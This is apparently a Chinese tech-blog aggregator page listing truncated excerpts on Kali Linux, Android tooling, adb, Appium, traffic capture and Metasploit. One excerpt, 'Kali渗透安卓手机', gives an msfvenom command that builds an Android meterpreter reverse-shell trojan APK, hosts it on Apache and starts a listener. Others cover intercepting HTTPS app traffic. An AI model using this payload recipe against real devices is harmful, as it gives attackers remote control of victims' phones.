首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
kali文件发送到手机
2024-08-30
电脑kail linux 连接手机Nethunter,手机和电脑互传文件
1.开启nethunter的ssh 修改/etc/ssh/sshd_config 参考:解决kali linux 开启ssh服务后连接不上的问题 2.如果在手机终端修改不了(我的就是怎么也改不了),可以开启vnc 点击stat server 输入密码:rootroot 尝试在手机vnc 客户端修改/etc/ssh/sshd_config 3.如果2中还是不方便修改(反正我的怎么点击都没反应),就在电脑安装vnc客户端:https://www.realvnc.com/en/connect/down
Kali渗透安卓手机
kali渗透安卓手机 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 R > test.apk 在终端输入ifconfig查看本机ip地址 开启apache服务service apache2 start 将文件放在服务器cp test.apk /var/www/html 查看服务器目录文件ls /var/www/html 可以看到已经在服务器下生成了test.apk文件 2.开启监听 输入msfcons
BLE-NRF51822教程17-DFU使用手机升级
演示的工程是 [application] nRF51_SDK_10.0.0_dc26b5e\examples\ble_peripheral\ble_app_hrs\pca10028\s110_with_dfu [bootload] nRF51_SDK_10.0.0_dc26b5e\examples\dfu\bootloader\pca10028\dual_bank_ble_s110 [softdevice] nRF51_SDK_10.0.0_dc26b5e\componen
Python爬虫入门教程 47-100 mitmproxy安装与安卓模拟器的配合使用-手机APP爬虫部分
1. 准备下载软件 介绍一款爬虫辅助工具mitmproxy ,mitmproxy 就是用于MITM的proxy,MITM中间人攻击.说白了就是服务器和客户机中间通讯多增加了一层.跟Fiddler和Charles最大的不同就是,mitmproxy可以进行二次开发,尤其可以对接python. mitmproxy一般用于开发或者测试,用在爬虫辅助也是极好的. 1.1 几个重要地址 github地址:https://github.com/mitmproxy/mitmproxy 官网地址:https://
NRF51822之DFU使用手机升级
演示的工程是 [application] nRF51_SDK_10.0.0_dc26b5e\examples\ble_peripheral\ble_app_hrs\pca10028\s110_with_dfu [bootload] nRF51_SDK_10.0.0_dc26b5e\examples\dfu\bootloader\pca10028\dual_bank_ble_s110 [softdevice] nRF51_SDK_10.0.0_dc26b5e\componen
Fiddler4 手机抓包
1.要对计算机Fiddler进行配置,允许远程计算机连接. 2.保证手机电脑在同一局域网中. 3.手机上设置代理服务器.以华为手机为例,设置-->WLAN-->找到并长按目前所连接的WiFi-->修改网络-->勾选显示高级选项-->代理-->选择手动-->输入FIddler所在主机IP及端口-->确定. 4.在手机上安装证书.(为了抓取https包) 方法1:在手机浏览器上输入:http://IPv4地址:端口(例如:http://192.168.11.29
转 Fiddler4 手机抓包
Fiddler4 手机抓包 文章转自:https://www.cnblogs.com/zhengna/p/10876954.html 1.要对计算机Fiddler进行配置,允许远程计算机连接. 2.保证手机电脑在同一局域网中. 3.手机上设置代理服务器.以华为手机为例,设置-->WLAN-->找到并长按目前所连接的WiFi-->修改网络-->勾选显示高级选项-->代理-->选择手动-->输入FIddler所在主机IP及端口-->确定. 4.在手机上安装证书
移动端https抓包那些事--初级篇
对于刚刚进入移动安全领域的安全研究人员或者安全爱好者,在对手机APP进行渗透测试的时候会发现一个很大的问题,就是无法抓取https的流量数据包,导致渗透测试无法继续进行下去. 这次给大家介绍一些手机端如何抓取https流量的技巧. 下面将主要通过两个层次篇章来逐步向大家进行介绍: 第一篇章-初级篇:浅层次抓包.对于非root设备(Android)或非越狱设备(iOS)如何抓取https流量: 第二篇章-进阶篇:深层次抓包.对于root设备或者越狱设备如何抓取https流量. 对于非roo
Metasploit运行环境内存不要低于2GB
Metasploit运行环境内存不要低于2GB Metasploit启用的时候,会占用大量的内存.如果所在系统剩余内存不足(非磁盘剩余空间),会直接导致运行出错.这种情况特别容易发生在虚拟机Kali系统或者手机Linux Deploy运行Kali的情况.使用这类系统,保证所在的Kali Linux系统内存不要低于2GB.
搭建ionic3-angular5 开发环境并打包成安卓apk包教程
安装node.js 搭建ionic3-angular5 开发环境,首先查看本地电脑是否安装node环境,打开终端,输入 命令: node -v 没有去安装nodejs 网址:http://nodejs.cn/download/ 安装ionic 接着在终端输入: 命令: npm install -g ionic 接着检验java开发环境: 在终端输入: 命令: java 命令:java -version java 下载地址:https://www.oracle.com/technetwork/
常见adb指令
1. adb –-help 查看帮助文档 2. adb start-server 当adb没有启动或被手动杀掉时,可以使用该命令启动服务 3. adb kill-server 杀死adb服务 4. adb devices 获取手机标识码 5. adb shell getprop ro.build.version.release 获取当前手机系统版本 6. adb shell 进入到手机终端 7. adb push 电脑端文件路径/需要发送的文件 手机端存储的路径 作用:将电脑上的文件发送给手机
python3编写网络爬虫19-app爬取
一.app爬取 前面都是介绍爬取Web网页的内容,随着移动互联网的发展,越来越多的企业并没有提供Web页面端的服务,而是直接开发了App,更多信息都是通过App展示的 App爬取相比Web端更加容易 反爬虫能力没有那么强,而且数据大多数是以JSON形式传递的 解析更加简单 在Web端 我们可以通过浏览器开发者工具 监听到各个网络请求和响应过程 在App端 查看内容就需要抓包软件例如 WireShark Fiddler Charles mitmproxy AnyProxy等 它们原理基本相同 可以
免费苹果账号(apple id)申请ios证书p12真机调试
HBuilder可以直接打包越狱版的ipa包,但需要越狱手机才能安装,如果需要安装到没越狱的手机安装,需要自己申请ios证书打包. 一般是需要一个付费了的苹果开发者账号才能申请ios证书打包. 这里介绍用普通的没有付费的苹果账号(apple id),直接申请ios证书p12,打包安装到没有越狱的手机真机调试,完全免费. 当然如果要上架App Store还是需要注册一个付费的苹果开发者账号. 苹果开发者账号申请教程 申请ios证书打包ipa测试分五步进行 1.申请一个苹果账号 2.申请ios测试证
ionic3 创建项目至apk打包全过程教程
主要流程: 安装node.js --> 安装jdk --> 安装AndroidSDK --> 安装cordova --> 安装ionic --> 创建项目 --> 编译项目apk 一.安装nodejs 不要安装最新版. 不建议更改安装路径. 网盘地址: 链接: https://pan.baidu.com/s/1Q5_nAhaJq6Ahw5DqSIzxXA 密码: 2sy7 查看nodejs版本: node -v 查看npm版本: npm -v 安装
20145233《网络对抗》Exp5 MSF基础应用
20145233<网络对抗>Exp5 MSF基础应用 实验问题思考 什么是exploit,payload,encode exploit是发现了的可以利用的安全漏洞或者配置弱点,这类模块存储着收集到的可利用漏洞和弱点. payload就是在利用漏洞成功后要做的事情,本质上是一段shellcode,通常都是用来获取会话的. encode是编码器,一方面确保之前的payload也就是载荷不出现坏字符影响使用,另一方面尽量掩饰载荷,进行免杀处理. 实验内容 MSF的六种模块 Exploit模块 利用发
Android入门篇(一)Androidproject的搭建,导入与导出,图标的改动
先说一些题外话吧.这是小珂同学的处女作.可能写的不好,请各位读者见谅.我先讲讲我为什么要写博文,那应该也是机缘巧合,有一次.我问学长一个问题,学长发了一个连接给我,里面是一篇博客.那时我仅仅是看看,后来还有一个学长给我介绍了CSDN.NET.看了里面的文档,才有了自己写博客的想法.前两天.我才知道原来学长们从大一就開始写了.我非常遗憾我错过了好多时间.也非常幸运..........(万千感慨) 近期几天我学习了Android.之前并没有学过Java,只是如今感觉自己还是入了门吧. 没学Ja
mitmproxy 使用笔记
零.背景 我之前写过关于 charles 的使用笔记,为什么现在又要来写同类型的 mitmproxy 工具呢?下面我会娓娓道来他比 charles 多出的强大功能. 一.介绍 mitmproxy 是一个支持 HTTP 和 HTTPS 的抓包程序, 类似 Fiddle.Charles , 只不过它通过 CMD 的形式操作. mitmproxy 还有两个关联组件: 一个是 mitmdump ,它是 mitmproxy 的命令行接口,利用它可以对接 Python 脚本,实现监听后的处理: 另一个是 m
1.移动端自动化测试-知识笔记(面试必备,测试点,adb命令)
移动端测试: 移动应用,特性(功能) 满足 需求(产品文档,隐性需求) 一.App功能测试: 死活背下来1.业务逻辑正确性测试: 产品文档,隐性需求- 写成测试用例 2.兼容性测试: 1.系统版本: android版本:官方版本(5.1 4.3 6.0…) 华为 小米 魅族 iOS版本:官方版本 2.分辨率:480x720 1920x 1080,关注点:图片展示 3.网络情况:2G 3G 4G Wi-Fi (闲话:图片下载时网络切换会压缩图片但是
(appium+python)UI自动化_10_adb常用命令
前言 adb(Android Debug Bridge)工具是android-sdk里的一个工具,是一个命令行窗口,用于通过电脑端与模拟器或者真实设备交互.在app自动化测试过程中,有时要用到adb命令,但是每次都要百度感觉很是繁琐,故总结了下app自动化过程中几个常用的adb命令. adb常用命令 获取设备号 $ adb devices 下载apk 前提:需下载apk至电脑 $ adb install <电脑apk路径> 卸载apk $ adb uninstall <apk包名>
『与善仁』Appium基础 — 4、常用ADB命令(一)
目录 1.启动和关闭ADB服务 2.查看ADB版本 3.指定adb server的网络端口 4.查询已连接设备/模拟器 5.获取安卓系统版本 6.为命令指定目标设备 7.发送文件到手机 8.从手机拉取文件 在上一篇文章中说明了ADB命令的使用方式: 使用ADB命令的前提是保证手机或者模拟器和电脑是连接状态. 使用adb connect 127.0.0.1:+端口号命令,进行链接. 本篇文章详细说明一下常用ADB命令的操作. 1.启动和关闭ADB服务 在某些情况下,可能需要终止然后再启动服务端进程
『与善仁』Appium基础 — 16、APPium基础操作API
目录 1.前置代码 2.安装和卸载APP 3.判断APP是否已安装 4.关闭APP软件和关闭驱动对象 5.发送文件到手机和获取手机中的文件 6.获取当前屏幕内元素结构(重点) 7.脚本内启动其他APP 8.将应用程序置于后台运行(重点) 1.前置代码 一个脚本中必须要编写的内容,写在前置代码中: # server 启动参数 desired_caps = {} desired_caps['platformName'] = 'Android' desired_caps['platformVersio
热门专题
微信支付分账python实现
centos 限制cpu频率
ec s3c2410x test b/d usb驱动
gitlab容器clone http可以clonessh不行
java 获取当前时间最近的一个整5分钟
在wordcount后eclipse中没有输入文件
pyqt 改变model ListView没有修改
html 手机端和pc端字体不一致
c语言实现mmap映射
node.js 把一个函数加到对象
java SQLSERVER JDBC 需要另外下载吗
loadrunner两种录制方式有什么不同,说明优缺点和使用
mfc如何从一个窗口获取另一个窗口的picture控件句柄
java构造方法的隐式三行
windows主机测试端口方法
Nodejs ts express获取POST参数值
winform 自定义对话框
docker有哪些安装包
brew 安装 mysql 无法用客户端连接
mybatis <update> 返回值